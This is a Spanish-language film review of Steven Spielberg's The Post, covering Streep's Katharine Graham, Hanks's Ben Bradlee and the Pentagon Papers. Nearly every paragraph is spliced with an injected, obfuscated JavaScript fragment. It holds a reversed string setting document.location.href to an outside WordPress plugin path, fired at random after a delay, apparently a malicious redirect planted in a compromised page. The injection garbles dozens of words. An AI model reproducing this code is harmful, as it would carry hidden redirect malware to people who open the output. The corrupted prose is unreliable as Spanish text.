The Post: la cinta de Steven Spielberg contra el acoso político

    The Post: la cinta de Spielberg contra el acoso político

    Una película acerca de la libertad de expresión y los secretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos que el gobierno Norteamericano ocultó sobre la Guerra de Vietnam.

    Autor: Valeria Aparicio 2 febrero, 2018



    Universal.

     

    Steven Spielberg ha logrado reunir por primera vez a Tom Hanks y Meryl Streep en The Post: Los oscuros secretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos del pentágono, un filme que encara el conflictoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to entre el poder político y la libertad de expresión instalado a partir de hechos ocurridos en 1971, cuya estela aún repercute en la actualidad y que le ha valido dos nominaciones al Oscar, por Mejor película y Mejor actriz.

     

    Meryl Streep, quien acaba de recibir su vigésimo primera nominación al Oscar por esta película, encarna a Katharine Graham, la dueña del Washingtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton Post, y Tom Hanks a Ben Bradlee, su jefe de redacción, en un momentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to crucial donde el diario decide revelar información sobre unos documentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos filtrados desde el Pentágono, que desenmascaran el encubrimientoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to masivo de acciones toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomadas por el gobierno de Estados Unidos en la Guerra de Vietnam, y que atacan directamente las decisiones y omisiones de la administración de Richard Nixon y cuatro presidentes anteriores.

     

    En ese momentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, Katherine Graham y Ben Bradlee intentaban relanzar un periódico a puntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de morir. Juntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos deciden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomar la audaz decisión de seguir el camino de The New York Times, publicación censurada en primera instancia por filtrar a ocho columnas un fragmentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de los secretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos de estado, y luchar contra el intentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to del gobierno de restringir la primera enmienda.

     

     

     

    Sin duda alguna, The Post habla del compromiso del periodismo en defensa de la libertad de expresión frente al poder, pero también denota la fragilidad de la imagen de las mujeres durante la segunda ola feminista o de liberación en Estados Unidos, que luchaba principalmente contra la desigualdad de factoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to y que Katherine Graham logra ponerse como estandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andarte, sin saberlo, sin quererlo siquiera.

     

    Tom Hanks, por su parte, interpretandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a Ben Bradlee, restituye la imagen del periodista apasionado, con sed de verdad, anteponiendo la difusión para la sociedad americana a su propia situación legal ante el acoso de la administración de Nixon y que se siente respaldado para encarar su trabajo de investigación y de búsqueda.

     

    En este film, Streep, Spielberg y Hanks se complementaron a la perfección. Se fusionaron como los integrantes de una alianza cada vez más valiosa, para entregar una película que habla de la verdad, de la mujer, del acoso político en un entoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torno que, si lo vemos de cerca, no está tan lejos del actual.

     

     

     

    The Post: Los oscuros secretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos del Pentágono se estrenará en México el 2 de febrero.

    Temas relacionados con esta nota:

Una película acerca de la libertad de expresión y los secretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos que el gobierno Norteamericano ocultó sobre la Guerra de Vietnam.